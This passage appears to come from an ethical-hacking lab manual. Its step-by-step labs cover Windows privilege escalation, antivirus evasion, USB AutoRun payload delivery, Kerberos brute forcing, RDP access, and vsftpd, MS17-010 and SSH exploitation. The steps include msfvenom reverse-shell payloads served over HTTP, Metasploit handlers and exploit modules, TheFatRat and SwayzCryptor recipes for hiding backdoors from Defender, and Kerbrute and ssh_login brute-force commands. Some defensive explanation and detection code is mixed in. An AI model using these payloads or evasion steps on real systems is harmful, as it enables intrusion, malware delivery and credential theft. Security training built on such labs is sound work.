1- Open your Kali machine, open a new terminal and type:
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe
LHOST=<your IP> LPORT=4445 -o /var/www/html/PrivilegeEsclation2.exe

Then type service apache2 start so the file is served at http://<your IP>/PrivilegeEsclation2.exe.

2- In the terminal type msfconsole, and type the following:
• use multi/handler
• set payload windows/meterpreter/reverse_tcp
• set LHOST <your IP>
• set LPORT 4445
• exploit

3- On the victim's machine, open a web browser, browse to http://<your IP>/PrivilegeEsclation2.exe,
download the file and run it.

4- After the victim runs the program, a meterpreter session opens. Type getuid to note the
user you are running as, then type background to leave the session running in the background.
Then type search uac.

5- A list of UAC-bypass local exploit modules appears. Type use exploit/windows/local/bypassuac
(the figure shows use 5; the index depends on the search results, so prefer the full module name).
This module only helps when the compromised user is already a member of the local Administrators
group and UAC is not set to Always notify: it bypasses the consent prompt, it does not turn a
standard user into an administrator. Newer bypassuac_* modules exist for current Windows 10/11
builds on which this one fails.

6- Type sessions -l to find the meterpreter session ID, then type set SESSION <session ID>.

7- Now type run. If the session already runs with high integrity, the module reports that the
privileges are already elevated; otherwise a new, elevated meterpreter session opens. Verify with
getuid, then type getsystem to move from the elevated administrator context to NT AUTHORITY\SYSTEM.

8- This concludes the demonstration of Windows privilege escalation.

Part 4.5: Antivirus backdoor evasion

Antivirus backdoor evasion is a technique used by malware creators to bypass
antivirus software and avoid detection. A backdoor is a type of malware that
provides a remote attacker with unauthorized access to a compromised system,
and antivirus software is designed to detect and remove such malware. However,
malware creators use various methods to evade detection by antivirus software,
including:

Polymorphic code: Malware creators use polymorphic code to change the structure
of the malware in a way that makes it difficult for antivirus software to detect.
The code is changed every time the malware is executed, making it hard to identify
a specific pattern.

Code obfuscation: Malware creators use code obfuscation to hide the true intent of
the code. This makes it harder for antivirus software to identify the code as
malicious.

Encryption: Malware creators encrypt the malicious payload and wrap it in a small stub
that decrypts it at run time. The encrypted body matches no signature on disk, but the
stub must still decrypt and execute the payload in memory, so memory scanning and
behavioural detection still apply, and the unusually high entropy of the encrypted
section is itself a signal that scanners use.

Fileless malware: Malware creators use fileless malware to avoid detection by
antivirus software. Fileless malware operates in memory and does not write any
files to the disk, making it difficult for antivirus software to detect.

Anti-analysis techniques: Malware creators add checks for the environments in which
analysts and security products run samples, such as virtual machines, sandboxes and
debuggers, and make the malware sleep, exit or behave benignly when one is detected,
so automated analysis never observes the malicious behaviour.

1- From your web browser, access TheFatRat GitHub and download the program.

2- In the terminal, type cd <path to TheFatRat>, then type chmod -R 755 <path to
TheFatRat>. Then type ./setup.sh

Note: -R applies the permission change recursively to every file and subdirectory.

3- Select “Install backdoor factory from kali repository.”

4- Here, just press enter to set the default output folder.

5- Here, press y.

6- Now, in the terminal type fatrat.

7- Type 3 “Create Fud backdoor with Avoid 1.2”

8- Type the backdoor name, and name the auto files Auto.

9- Then setup the connection, LHOST: <your IP>, LPORT: 4444.

10- Now, choose 3 “super stealth”.

11- After the process is done, the file location is printed on the screen.

12- Copy the backdoor to /var/www/html, then in the terminal type service apache2 start. On
your Windows machine, access the Kali IP from a web browser and download the backdoor while
Windows Defender is turned on.

As illustrated, Windows Defender did not detect the backdoor. This result depends on the
Defender definitions and cloud-delivered protection state at the time of the test: a sample
that passes today is often detected once signatures are updated, and it can still be caught
at run time when the payload is decoded in memory.

Part 4.6: Advanced Antivirus Evasion Techniques

Advanced antivirus evasion techniques are used by malware authors to evade detection by
antivirus software. These techniques are designed to make it more difficult for antivirus
software to identify and remove malicious code from infected systems.

Some common advanced antivirus evasion techniques include:

Polymorphic malware: Polymorphic malware is a type of malware that changes its code
structure with each infection, making it more difficult for antivirus software to identify and
block.

Code obfuscation: Code obfuscation involves modifying the source code of a malware
program in such a way that it becomes more difficult for antivirus software to recognize and
identify malicious code.

Rootkit techniques: Rootkits are a type of malware that are designed to hide their presence
from the operating system and antivirus software. Rootkits can be used to modify system files,
processes, and registry keys to avoid detection.

Fileless malware: Fileless malware is a type of malware that does not leave any files on the
infected system. Instead, it resides in the memory of the system, making it more difficult for
antivirus software to detect.

Sandbox evasion: Sandboxes are virtual environments that allow antivirus software to test and
analyze suspicious files in a safe and isolated environment. Malware authors can use sandbox
evasion techniques to detect and evade these virtual environments, making it more difficult for
antivirus software to detect and remove the malware.

1- Download SwayzCryptor and open the program. Click the three-dot browse button next to File.

2- Select the backdoor used in the Part 4.5.

3- Now click the three-dot button next to Icon and choose an .ico file.

4- Bind the backdoor to a well-known benign program so the file behaves plausibly under
dynamic analysis. Also check the boxes as in the figure, then press Encrypt.

5- An encrypted file is generated and saved in the Desktop.

6- Right-click on the encrypted file and create a RAR Archive.

7- Protect the archive with a password by pressing the Set password button (a scanner cannot
open an encrypted archive, which is why mail gateways commonly block or quarantine
password-protected attachments).

8- Type your password and click ok.

9- Then press ok.

10- Upload the file to VirusTotal to see how many security vendors detect the malware. Be
aware that VirusTotal shares uploaded samples with vendors: anything you upload is effectively
burned for future engagements, so do not upload tooling you intend to keep using.
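The trade-off that Parts 4.5 and 4.6 rely on, a crypter beating the on-disk scan while leaving a different signal behind, can be seen in a few lines of Python. The following is an added example, not part of the lab manual and not code from TheFatRat, SwayzCryptor or any antivirus product: a constructed placeholder stands in for the backdoor bytes, a toy SHA-256 counter-mode keystream stands in for the crypter's encryption layer, and the byte signature and entropy threshold are assumptions. It shows that encoding changes the file hash and hides the byte signature, while the Shannon entropy of the result rises to nearly 8 bits per byte, which is the packed-file heuristic many scanners apply.

```python
import hashlib
import math
from collections import Counter

# Constructed stand-in for the bytes of a backdoor executable (an assumption
# for this example; no real payload is involved).  Code and text sections of
# real binaries are similarly low-entropy.
SAMPLE_PAYLOAD = b"MZ\x90\x00" + b"This program cannot be run in DOS mode.\r\n" * 50

# A byte pattern a signature engine might carry for this sample (assumed).
SIGNATURE = b"cannot be run in DOS mode"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant stream, 8.0 for uniformly random."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def keystream(key: bytes, length: int) -> bytes:
    """SHA-256 in counter mode: a toy stream cipher standing in for the
    crypter's encryption layer (not what any real crypter uses)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def crypt(data: bytes, key: bytes) -> bytes:
    """XOR with the keystream; the same call encrypts and decrypts, which is
    what the crypter's runtime stub does in memory before executing."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))


def signature_hit(data: bytes) -> bool:
    """Static signature scan: does the known byte pattern occur on disk?"""
    return SIGNATURE in data


def looks_packed(data: bytes, threshold: float = 7.0) -> bool:
    """Packed/encrypted-file heuristic used by AV engines and triage tools:
    content near 8 bits/byte is compressed or encrypted, which is itself a
    reason for closer inspection.  The threshold is an assumption."""
    return shannon_entropy(data) >= threshold


def demo(key: bytes = b"lab-key-1") -> dict:
    """Run the plain and the encoded sample through both checks."""
    encoded = crypt(SAMPLE_PAYLOAD, key)
    return {
        "hash_changed": hashlib.sha256(encoded).digest()
                        != hashlib.sha256(SAMPLE_PAYLOAD).digest(),
        "signature_on_plain": signature_hit(SAMPLE_PAYLOAD),
        "signature_on_encoded": signature_hit(encoded),
        "entropy_plain": round(shannon_entropy(SAMPLE_PAYLOAD), 2),
        "entropy_encoded": round(shannon_entropy(encoded), 2),
        "flagged_by_entropy": looks_packed(encoded),
        "round_trip_ok": crypt(encoded, key) == SAMPLE_PAYLOAD,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:>22}: {value}")
```

Running it shows the signature matching only the plain sample, the hash differing, and the encoded sample flagged by the entropy heuristic; the round trip confirms the payload is intact once decrypted, which is why in-memory and behavioural detection remain effective against crypted samples even when the on-disk scan passes.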

Part 4.7: USB Rubber Ducky

A USB Rubber Ducky is a type of USB device that looks like a regular USB flash
drive but is actually a tool used for penetration testing and other security-related
tasks. The device is designed to simulate a keyboard, allowing it to execute pre-
programmed keystrokes and commands on a target computer. The keystrokes can
be programmed to perform a wide range of actions, such as opening a command
prompt, launching a script, or running a malicious payload.

The USB Rubber Ducky is often used by security professionals for testing the
security of computer systems and networks, as well as for educational purposes.
It can be used to test the effectiveness of security measures and identify potential
vulnerabilities in computer systems.

The device is typically programmed using a simple scripting language called
Ducky Script, which is easy to learn and can be used to create complex scripts.
The Ducky Script is essentially a set of commands that the USB Rubber Ducky
will execute on the target computer when it is plugged in.

The USB Rubber Ducky is designed to work with any operating system that
supports USB keyboards, including Windows, macOS, and Linux. Once the device
is plugged into a target computer, it will execute the pre-programmed keystrokes
and commands, which can be used to perform a wide range of tasks.

While the USB Rubber Ducky can be a powerful tool for security testing, it can
also be used for malicious purposes, such as stealing sensitive data or installing
malware on a target computer. As such, it is important to use the device
responsibly and only for legitimate purposes. Because the device enumerates as a
keyboard, defenses that only block mass-storage devices or file transfers do not
stop it: effective controls are device-control policies that allow only approved
USB device classes and vendor/product IDs, physically disabling unused ports,
locking the screen when unattended, and disabling AutoRun/AutoPlay for the
autorun-style attack demonstrated below.

1- From your web browser, download SamLogic USB AutoRun Creator
(https://www.samlogic.net/usb-autorun-creator/usb-autorun-creator.htm).

Note: unlike a real Rubber Ducky, which needs nothing on the target because it presents
itself as a keyboard, this lab relies on AutoRun-style launching handled by the helper
installed on the Windows machine in step 3; Windows 7 and later, and older versions with the
2011 AutoRun update, no longer honour autorun.inf on removable flash drives.

2- Press on "SamLogic: USB AutoRun Creator – Demo (6MB)"

3- Follow the wizard installation and restart your computer. Then press windows key
and type USB Auto run.

4- The main GUI will appear.

5- Now go back to your Kali machine and create a backdoor as in Part 4.4 (msfvenom with
windows/meterpreter/reverse_tcp, written to /var/www/html).

6- Set up the Metasploit multi/handler listener with the same payload, LHOST and LPORT.

7- From your windows machine, access the kali IP and download the backdoor.

8- Press on select to select the backdoor.

9- Select your backdoor and click open.

10- Then, click on browse to select the USB drive.

11- The USB drive in this case is volume D and click OK.

Note: the drive volume and location might differ in your lab environment.

12- Then press on create button.

13- Now unplug the USB drive from your device and plug it in again. Once the drive is
detected, the AutoRun helper launches the backdoor and a meterpreter session opens on the
Kali listener.

14- This concludes the demonstration of USB Rubber Ducky.

Part 4.8: Active Directory Intrusion

Active Directory is a centralized database that stores information about users,
computers, and other resources in a networked environment. It provides
authentication and authorization services to manage access to network resources.
Kerberos is a network authentication protocol that is commonly used by Active
Directory to authenticate users and services.

Kerbrute is a tool for user enumeration, password spraying and brute-force attacks
against the Kerberos authentication protocol. Its userenum mode needs no credentials at
all: it sends AS-REQ messages without pre-authentication and tells valid from invalid
usernames apart by the KDC's distinct error codes (KDC_ERR_PREAUTH_REQUIRED versus
KDC_ERR_C_PRINCIPAL_UNKNOWN). It can be used to test the strength of user passwords or
to attempt to gain unauthorized access to an Active Directory environment.

An Active Directory intrusion using Kerbrute typically involves the following steps:

Enumeration: The attacker performs reconnaissance to identify the target
environment's Active Directory infrastructure, including domain names, domain
controllers, and user accounts.

Password spraying: The attacker uses Kerbrute to test one or a few commonly used
passwords against a large number of user accounts in the target Active Directory
environment. Because each account sees only one or two guesses, the attack stays below
the account-lockout threshold while still finding the weakest passwords in the domain.

Brute-forcing: If password spraying is unsuccessful, the attacker may use Kerbrute to
brute-force a specific user account by trying a large number of candidate passwords
against it until the correct one is found. Against a domain with a lockout policy this
quickly locks the account, and every wrong guess is logged by the domain controller as
event 4771 with failure code 0x18, so attackers space the attempts out or avoid this mode.

Privilege escalation: Once the attacker gains access to a user account, they may
attempt to escalate their privileges to gain access to more sensitive information or
resources in the network.

Lateral movement: The attacker may then attempt to move laterally through the
network by compromising additional user accounts or exploiting vulnerabilities in
other systems to gain access to additional resources.

Data exfiltration: Finally, the attacker may attempt to exfiltrate sensitive data
from the network, which can be used for malicious purposes such as identity theft
or financial fraud.

To prevent Active Directory intrusions of this kind, organizations should enforce strong
passwords (long passphrases and banned-password lists), an account lockout or throttling
policy that makes spraying and brute forcing expensive, and multi-factor authentication
wherever possible. Domain controllers should be monitored for bursts of Kerberos failures
(events 4768 and 4771) from one source against many accounts, which is the visible signature
of a spray. Keeping all software and systems up to date with security patches and running
regular security audits and penetration tests help identify and address weaknesses before
attackers exploit them.

1- Using your web browser, open the Kerbrute GitHub repository
(https://github.com/ropnop/kerbrute) and press on Releases.

2- Press on "kerbrute_linux_amd64" to download the Linux binary.

3- Open a terminal in the download directory and type chmod +x kerbrute_linux_amd64

4- Start your Windows Server 2012 R2 domain controller.

5- Create a wordlist of candidate usernames and type ./kerbrute_linux_amd64 userenum --dc
<server IP> -d <domain> <username wordlist>. Valid accounts are reported; no password is
needed for this step.

6- Now, to find the password of ksh@Khaled.com, type ./kerbrute_linux_amd64 bruteuser --dc
<server IP> -d <domain> <password list> <user> (the user in this case is "ksh"). Outside the
lab, prefer ./kerbrute_linux_amd64 passwordspray --dc <server IP> -d <domain>
<username wordlist> <password>, which tries one password across all users and avoids
locking accounts.

7- Now that we have a valid username and password, we can use them against the domain
Khaled.com over SMB. Type crackmapexec smb <server IP> -u <user> -p <password> -d <domain>.
A [+] line confirms that the credentials are valid; the marker (Pwn3d!) appears only when the
account has local administrator rights on that host.

8- We can also enumerate the SMB shares the user can reach and the permissions on each. Type
crackmapexec smb <server IP> -u <user> -p <password> -d <domain> --shares

Part 4.9: System Hacking Using Remote Desktop Protocol (RDP)

Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft
that enables users to remotely connect to a computer over a network connection.
RDP allows a user to access and control a remote computer as if they were
physically sitting in front of it.

RDP is used extensively in business environments to provide remote access to
servers, desktops, and applications. It allows remote workers to access company
resources from home or on the go, increasing productivity and flexibility. RDP is
also used by IT professionals for remote support and troubleshooting.

To use RDP, the remote computer must run the RDP server (Remote Desktop Services,
listening on TCP port 3389 by default) and the local computer needs an RDP client,
such as mstsc on Windows or rdesktop and xfreerdp on Linux. The client initiates a
connection by specifying the remote computer's IP address or hostname and providing
valid login credentials. Once connected, the user controls the remote computer using
their keyboard and mouse.

Modern RDP protects the session with TLS and, when Network Level Authentication (NLA)
is enabled, authenticates the user through CredSSP before any session is created. The
legacy "standard RDP security" mode uses RC4 with an RSA key exchange that clients
cannot meaningfully verify. Whether a deployment is secure therefore depends on
configuration: NLA enabled, a trusted server certificate, and port 3389 not exposed to
the Internet.

However, RDP is also a common target for attackers who seek to exploit its vulnerabilities to
gain unauthorized access to a remote computer. Some common RDP exploits include:

Brute Force Attacks: Attackers attempt to guess the login credentials for a remote desktop
using a list of common passwords or dictionary attacks. If successful, the attacker gains full
control over the target machine.

BlueKeep Exploit: BlueKeep (CVE-2019-0708) is a pre-authentication remote code execution
vulnerability in Remote Desktop Services affecting Windows 7, Windows Server 2008 and 2008 R2,
and the out-of-support Windows XP and Server 2003. It allows an unauthenticated attacker to
execute code on the target; enabling NLA blocks exploitation by unauthenticated clients.

Man-in-the-Middle Attacks: When a server is configured for standard RDP security, or clients
accept an untrusted certificate, an attacker on the path can impersonate the server, relay the
session and capture keystrokes, including the credentials typed at logon. NLA with a validated
server certificate prevents this.

Denial-of-Service (DoS) Attacks: Attackers flood the RDP server with traffic, causing it to
crash or become unresponsive. This prevents legitimate users from accessing the server.

To mitigate RDP exploits, it is recommended to use strong passwords, implement two-factor
authentication, update software and operating systems regularly, and use a virtual private
network (VPN) to encrypt traffic between the client and the server.

1- On the Windows Server machine, right-click This PC and choose Properties (or open
Control Panel > System).

2- From the left panel, click on Remote settings.

3- Select "Allow remote connections to this computer" and uncheck the box "Allow connections
only from computers running Remote Desktop with Network Level Authentication". Unchecking it
disables NLA, which is what lets the legacy client used in step 5 connect; in production that
box should stay checked.

4- On your Kali machine, open a new terminal and type nmap -p 3389 --script rdp-enum-encryption
<Server IP>. The script performs the X.224 negotiation with each security protocol and reports
which ones the server accepts (standard RDP, TLS, CredSSP/NLA) and whether NLA is required.

5- Then type rdesktop -d <domain> -u <Server username> -p <password> <server IP>. rdesktop
does not support NLA, so this only works because of step 3; against an NLA-enabled server use
xfreerdp /d:<domain> /u:<Server username> /p:<password> /v:<server IP> instead.

6- Now you can use the server remotely.
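The negotiation that nmap's rdp-enum-encryption performs in step 4, and that decides whether rdesktop can connect at all, is the X.224 Connection Request/Confirm exchange that opens every RDP session (MS-RDPBCGR). The Python below is an added example, not part of the lab manual, nmap or rdesktop: it builds the client request, parses the server's confirm, and includes a small simulated server (an assumption, so the exchange can be exercised offline) that answers like a host with NLA required or, as after step 3, with NLA disabled. The live probe at the end only illustrates how the same functions are pointed at a real host.

```python
import socket
import struct

# requestedProtocols / selectedProtocol flags (MS-RDPBCGR 2.2.1.1.1)
PROTOCOL_RDP, PROTOCOL_SSL, PROTOCOL_HYBRID = 0x0, 0x1, 0x2
TYPE_NEG_REQ, TYPE_NEG_RSP, TYPE_NEG_FAILURE = 0x01, 0x02, 0x03
HYBRID_REQUIRED_BY_SERVER = 0x05
FAILURE_CODES = {
    0x01: "SSL_REQUIRED_BY_SERVER", 0x02: "SSL_NOT_ALLOWED_BY_SERVER",
    0x03: "SSL_CERT_NOT_ON_SERVER", 0x04: "INCONSISTENT_FLAGS",
    0x05: "HYBRID_REQUIRED_BY_SERVER", 0x06: "SSL_WITH_USER_AUTH_REQUIRED_BY_SERVER",
}
PROTOCOL_NAMES = {0x0: "standard RDP security", 0x1: "TLS", 0x2: "CredSSP (NLA)"}


def _tpkt(x224_body: bytes) -> bytes:
    """TPKT header (RFC 1006) plus the X.224 length indicator around a TPDU body."""
    x224 = bytes([len(x224_body)]) + x224_body
    return struct.pack(">BBH", 3, 0, 4 + len(x224)) + x224


def build_connection_request(requested_protocols: int, cookie: str = "mstshash=lab") -> bytes:
    """Client -> server: X.224 Connection Request carrying an RDP_NEG_REQ."""
    neg_req = struct.pack("<BBHI", TYPE_NEG_REQ, 0, 8, requested_protocols)
    body = b"\xe0\x00\x00\x00\x00\x00"  # CR code 0xE0, DST-REF, SRC-REF, class 0
    body += f"Cookie: {cookie}\r\n".encode("ascii") + neg_req
    return _tpkt(body)


def build_connection_confirm(neg_type: int, value: int) -> bytes:
    """Server -> client: X.224 Connection Confirm with RDP_NEG_RSP or RDP_NEG_FAILURE."""
    body = b"\xd0\x00\x00\x00\x00\x00"  # CC code 0xD0, DST-REF, SRC-REF, class 0
    return _tpkt(body + struct.pack("<BBHI", neg_type, 0, 8, value))


def parse_connection_request(data: bytes) -> int:
    """Return the requestedProtocols bitmask of a client request (0 if absent)."""
    tpdu = data[5:4 + 1 + data[4]]
    if tpdu[0] != 0xE0 or len(tpdu) < 14 or tpdu[-8] != TYPE_NEG_REQ:
        return PROTOCOL_RDP  # legacy client without negotiation data
    return struct.unpack("<I", tpdu[-4:])[0]


def parse_connection_confirm(data: bytes) -> dict:
    """Decode the server's answer into what a scanner reports."""
    if len(data) < 11 or data[0] != 3 or struct.unpack(">H", data[2:4])[0] != len(data):
        raise ValueError("malformed TPKT")
    if data[5] != 0xD0:
        raise ValueError("not an X.224 Connection Confirm")
    neg = data[11:4 + 1 + data[4]]  # rdpNegData follows the 7-byte X.224 header
    if len(neg) < 8:
        return {"type": "legacy", "selected_protocol": PROTOCOL_RDP,
                "name": "no negotiation data: standard RDP security only"}
    neg_type, _flags, _length, value = struct.unpack("<BBHI", neg[:8])
    if neg_type == TYPE_NEG_RSP:
        return {"type": "response", "selected_protocol": value,
                "name": PROTOCOL_NAMES.get(value, hex(value))}
    if neg_type == TYPE_NEG_FAILURE:
        return {"type": "failure", "failure_code": value,
                "name": FAILURE_CODES.get(value, hex(value))}
    raise ValueError(f"unknown negotiation type {neg_type:#x}")


def nla_required(confirm: dict) -> bool:
    """True when the server refused anything but CredSSP: NLA is enforced."""
    return confirm["type"] == "failure" and confirm["failure_code"] == HYBRID_REQUIRED_BY_SERVER


def simulate_server(request: bytes, supported: set, require_nla: bool) -> bytes:
    """Assumed minimal server policy so the exchange can run offline: pick the
    strongest requested protocol it supports, or refuse with a failure code."""
    requested = parse_connection_request(request)
    if require_nla and not requested & PROTOCOL_HYBRID:
        return build_connection_confirm(TYPE_NEG_FAILURE, HYBRID_REQUIRED_BY_SERVER)
    for proto in (PROTOCOL_HYBRID, PROTOCOL_SSL):
        if requested & proto and proto in supported:
            return build_connection_confirm(TYPE_NEG_RSP, proto)
    if PROTOCOL_RDP in supported:
        return build_connection_confirm(TYPE_NEG_RSP, PROTOCOL_RDP)
    return build_connection_confirm(TYPE_NEG_FAILURE, 0x01)  # SSL_REQUIRED_BY_SERVER


def probe(host: str, port: int = 3389, timeout: float = 5.0) -> dict:
    """Live check (not exercised offline): ask for each protocol in turn, as
    rdp-enum-encryption does; failure 0x05 on the RDP and TLS probes means NLA is mandatory."""
    results = {}
    for name, proto in (("rdp", PROTOCOL_RDP), ("tls", PROTOCOL_SSL), ("nla", PROTOCOL_HYBRID)):
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(build_connection_request(proto))
            head = sock.recv(4)
            total = struct.unpack(">H", head[2:4])[0]
            body = b""
            while len(body) < total - 4:
                chunk = sock.recv(total - 4 - len(body))
                if not chunk:
                    break
                body += chunk
            results[name] = parse_connection_confirm(head + body)
    return results
```

A server that answers the standard-RDP and TLS probes with failure code 0x05 is the hardened state; the lab server after step 3 answers the standard-RDP probe with a response selecting protocol 0, which is exactly what rdesktop needs and what an attacker on the path would prefer.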

Part 4.10: System Hacking Using FTP protocol.

FTP, or File Transfer Protocol, is a standard communication protocol used to transfer files over
the internet or other networks. It was first introduced in 1971 and has since undergone several
revisions to improve its functionality.

FTP works on a client-server model where the client computer requests files from the server
computer, which then sends them back to the client. The client and server communicate over a
TCP/IP network using a series of commands and responses.

FTP supports two modes of data transfer: ASCII and binary. ASCII mode is used for
transferring text files, while binary mode is used for transferring non-text files such as images,
audio, and video files.

FTP also supports user authentication, allowing users to log in to the server with a username
and password. Once authenticated, users can access their files on the server, download files
from the server, or upload files to the server. Classic FTP transmits both the credentials and
the data in clear text, so anyone on the path can capture them; FTPS (FTP over TLS) or SFTP
should be used instead.

vsFTPd (Very Secure FTP daemon) is an open-source FTP server for Unix-like systems. Despite
its name, it has had security issues in the past. Here are some of the most notable:

Backdoor in vsFTPd 2.3.4: In July 2011, it was discovered that the official vsFTPd download
site had been compromised and a backdoor added to the vsFTPd 2.3.4 tarball. Logging in with a
username containing the characters :) made the daemon open a root shell listening on TCP port
6200, with no password required. The Metasploitable virtual machine used below ships this
version, and Metasploit exploits it with exploit/unix/ftp/vsftpd_234_backdoor.

Denial of Service (DoS) vulnerability in vsFTPd 2.3.2: In August 2010, a DoS vulnerability
was discovered in vsFTPd 2.3.2. This vulnerability could be exploited by a remote attacker to
crash the vsFTPd server.

Heap-based buffer overflow in vsFTPd 2.3.2: In November 2011, a heap-based buffer
overflow vulnerability was discovered in vsFTPd 2.3.2. This vulnerability could be exploited
by a remote attacker to execute arbitrary code on the affected system.

Integer overflow vulnerability in vsFTPd 2.3.4: In October 2011, an integer overflow
vulnerability was discovered in vsFTPd 2.3.4. This vulnerability could be exploited by a
remote attacker to execute arbitrary code on the affected system.

It's worth noting that these vulnerabilities have been patched in newer versions of vsFTPd. It's
important to keep your software up to date to avoid known vulnerabilities.

1- Open metasploitable virtual machine.

2- On your Kali machine, open a new terminal and type nmap -sV -p 21 --script=vuln
<server IP>. The version banner shows vsFTPd 2.3.4 and the ftp-vsftpd-backdoor script reports
whether the backdoor trigger works.

3- Open Metasploit by typing msfconsole and type search vsftpd, then type
use exploit/unix/ftp/vsftpd_234_backdoor (shown as use 0 in the figure; the index may differ).

4- Set up the exploit parameters:
• set RHOSTS <Server IP>
• exploit
The module needs no payload: the backdoor itself provides a command shell, and typing id
shows that it runs as root.

5- This concludes the demonstration of the vsftpd vulnerability.

Part 4.11: System Hacking Using SMB Protocol

SMB (Server Message Block) is a network protocol used for sharing files, printers, and other
resources between computers on a network. It was originally developed by Microsoft for use
in its Windows operating system but has since been adopted by other platforms as well.

The SMB service allows computers on a network to access shared resources on other
computers. This is done by establishing a connection between the client (the computer
requesting the resource) and the server (the computer hosting the resource) using the SMB
protocol.

SMB provides a set of commands that allow the client to access files and other resources on
the server. These commands include opening and closing files, reading and writing data, and
listing the contents of directories.

SMB also supports authentication and authorization, allowing access to resources to be
restricted to authorized users or groups. This can be done using passwords, access control lists
(ACLs), and other security measures.

The MS17-010 vulnerability is a critical remote code execution vulnerability in Microsoft's
SMBv1 implementation. The exploit for it, known as EternalBlue, was developed by the National
Security Agency (NSA) and leaked by the Shadow Brokers group in April 2017; the WannaCry and
NotPetya outbreaks a few weeks later spread with it.

Exploiting this vulnerability allows an attacker to remotely execute code on a vulnerable
system without user authentication. The attacker can then take complete control of the targeted
system, steal data, install malware, or use the compromised system as a foothold to launch
further attacks within the network.

Metasploit offers several modules for MS17-010. exploit/windows/smb/ms17_010_eternalblue
targets 64-bit Windows 7 and Server 2008 R2 (and some later versions) through kernel pool
corruption, while exploit/windows/smb/ms17_010_psexec combines the same SMB transaction bug
with PsExec-style service creation over a named pipe and works against older systems such as
Windows XP and Server 2003 that the former does not support. PsExec itself is a legitimate
Sysinternals administration tool and does not exploit the vulnerability; only the
remote-service technique is borrowed from it. auxiliary/scanner/smb/smb_ms17_010 checks whether
a host is vulnerable without exploiting it.

To protect against this vulnerability, Microsoft released the MS17-010 security update in
March 2017 for supported Windows versions and, after WannaCry, in May 2017 for the
out-of-support Windows XP and Server 2003. Organizations should apply it immediately.
Additionally, they should disable SMBv1, segment their networks, block TCP port 445 at the
perimeter, and use strong passwords to further reduce the risk of exploitation.

1- Start your Windows XP machine.

2- On your Kali machine, type nmap -p 445 --script smb-vuln-ms17-010 <Windows XP IP> to
confirm that port 445 is open and the host is vulnerable (a plain nmap <Windows XP IP> lists
the open ports only).

3- Open Metasploit by typing msfconsole and type search ms17_010. Then type
use exploit/windows/smb/ms17_010_psexec (the eternalblue module does not support Windows XP).

4- Set up the exploit parameters:
• set RHOSTS <Windows XP IP>
(the default payload is windows/meterpreter/reverse_tcp; set LHOST explicitly if your Kali
machine has more than one interface)

5- Then type exploit. You now have access to the system.

6- This concludes the demonstration of exploiting the MS17-010 vulnerability in SMB.

Part 4.12: System Hacking Using SSH Protocol

SSH (Secure Shell) is a protocol used for secure remote access to networked
systems. It is a cryptographic network protocol that provides a secure way to
access a remote system over an unsecured network. SSH provides secure
authentication and encryption of data transferred between the client and the
server.

When a user connects to a remote server using SSH, the server authenticates the
user's identity using various methods such as passwords, public key cryptography,
or two-factor authentication. Once authenticated, the user can execute commands
on the remote system as if they were sitting in front of it. SSH encrypts all data
transmitted between the client and server, providing protection against
eavesdropping and tampering.

Whether or not it is safe to turn on the SSH service depends on the specific use
case and security requirements of the system. SSH itself is a secure protocol, but
as with any networked service, there are risks associated with enabling remote
access to a system. If the system has weak passwords or is otherwise vulnerable
to attack, enabling SSH could increase the risk of unauthorized access.

In general, it is important to follow best practices for securing SSH access, such
as using strong passwords or public key authentication, disabling root login, and
limiting access to trusted users. Additionally, regularly updating the SSH
software to address any known security vulnerabilities is also important to
maintain the security of the service.

1- Turn on your Metasploitable machine.

2- Using nmap, scan the target machine: type nmap -p 22 <IP Address>.

3- Start Metasploit by typing msfconsole in the terminal, and type search ssh_login. Then type use 0.

4- Set up the attack parameters:

• Set RHOSTS <IP Address of the victim>
• Set PASS_FILE <Path to a password wordlist>
• Set USERNAME msfadmin
• Set STOP_ON_SUCCESS true
• Then type run

5- The brute force completes and the password found is msfadmin.

6- The auxiliary module has created an SSH session; type show sessions.

7- Now, type sessions -i <number of the session>.

8- This concludes the lab of System Hacking using SSH Protocol.
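From the defender's side, the brute force in steps 4 and 5 leaves a burst of "Failed password" entries for one user from one source in the target's sshd log, followed by an "Accepted password" once the wordlist hits. The Python below is an added example (not part of the manual) that flags that pattern over constructed sshd log lines; the hostname, IP addresses and thresholds are made up.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sshd syslog lines modelling the ssh_login brute force in this lab
# (five wrong passwords for msfadmin, then the right one) plus benign noise.
SAMPLE_AUTH_LOG = """\
May  3 10:15:01 metasploitable sshd[2201]: Failed password for msfadmin from 192.168.56.101 port 40212 ssh2
May  3 10:15:01 metasploitable sshd[2203]: Failed password for msfadmin from 192.168.56.101 port 40214 ssh2
May  3 10:15:02 metasploitable sshd[2205]: Failed password for msfadmin from 192.168.56.101 port 40216 ssh2
May  3 10:15:02 metasploitable sshd[2207]: Failed password for msfadmin from 192.168.56.101 port 40218 ssh2
May  3 10:15:03 metasploitable sshd[2209]: Failed password for msfadmin from 192.168.56.101 port 40220 ssh2
May  3 10:15:03 metasploitable sshd[2211]: Accepted password for msfadmin from 192.168.56.101 port 40222 ssh2
May  3 10:20:45 metasploitable sshd[2300]: Failed password for alice from 10.0.0.7 port 51000 ssh2
May  3 10:21:10 metasploitable sshd[2302]: Accepted publickey for alice from 10.0.0.7 port 51002 ssh2
May  3 10:21:11 metasploitable CRON[2310]: pam_unix(cron:session): session opened for user root
"""

# One sshd authentication outcome per line; sshd adds "invalid user" for
# accounts that do not exist, so that prefix is optional.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)

def parse_events(log_text):
    """Return (time, ip, user, result, method) for every sshd auth line."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # CRON, sudo and other daemons are not our concern here
        # Syslog timestamps carry no year; that is fine for time deltas.
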